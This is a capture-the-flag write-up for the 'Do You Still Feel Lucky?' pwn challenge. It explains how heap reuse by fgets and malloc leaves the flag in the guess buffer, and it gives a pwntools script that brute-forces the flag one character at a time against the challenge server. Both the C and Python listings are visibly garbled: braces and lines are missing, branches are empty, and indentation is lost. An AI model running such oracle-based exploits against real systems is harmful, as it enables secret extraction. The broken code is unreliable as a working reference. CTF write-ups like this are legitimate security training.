Tags: pwn 


# Do You Still Feel Lucky? -- Solution

The user is given a seemingly impossible task of guessing the flag with useful feedback given when more than half the flag characters are guessed and again when all but two characters are guessed.

void read_flag() {
FILE* in;

in = fopen("flag.txt", "rt");
fgets(flag, 64, in);
flag_length = strlen(flag);

void guess_flag() {
int guess_length;
char *guess;
int ncorrect;
int i;

puts("Try to guess the flag!");
puts("Enter the length of your guess:");
scanf("%d", &guess_length);
guess = malloc(guess_length);
puts("Enter your guess:");
fgets(guess, guess_length, stdin);

ncorrect = 0;
for (i=0; i<guess_length && i<flag_length; i++)
if (guess[i] == flag[i])

if (ncorrect == flag_length)
puts("Got it!");
else if (ncorrect == flag_length-2)
else if (ncorrect*2 >= flag_length)
puts("Getting there!");
puts("Not even close.");


Exploit is possible due to a bug in how the guess is read and compared to the flag, but also a bit of luck with the allocator:

1. With the provided libc, `fgets` will allocate (and subsequently free) heap memory to store the data read from the file -- the flag in our case. Later, when `malloc` is used to allocate memory for the guess, it will return the same heap address used by `fgets` that will *already contain the flag*.

2. If the user sends a string shorted than `guess_length`, the string is zero-terminated, but all the `guess_length` number of characters will be compared to the flag. Hence, as long as the user sends some *prefix* of the flag, the number of calculated number of correct characters will be `n-2` (all except newline and zero characters).

Therefore, we can search the flag characters one by one always maintaining a correct prefix.

#!/usr/bin/env python3

import string

from pwn import *

def conn():
context.update(arch='amd64', os='linux', terminal=['tmux', 'new-window'])
if args.REMOTE:
p = remote( '0.cloud.chals.io', 25330)
p = process('./chall')
return p

def guess(k, s):
p = conn()
p.sendlineafter(b':\n', str(k).encode())
p.sendlineafter(b':\n', s.encode())
ret = p.recvline()
return ret.strip().decode('ascii')

C = 'TBTL'
for i in range(60):
next = None
for x in string.printable:
g = guess(64, C+x)
print(C+x, g)
if g == 'Got it!':
elif g[0] == 'A':
next = x
assert next
C += x

Original writeup (https://github.com/blockhousetech/TBTL-CTF/tree/master/2023/Pwn/do_you_still_feel_lucky/solution).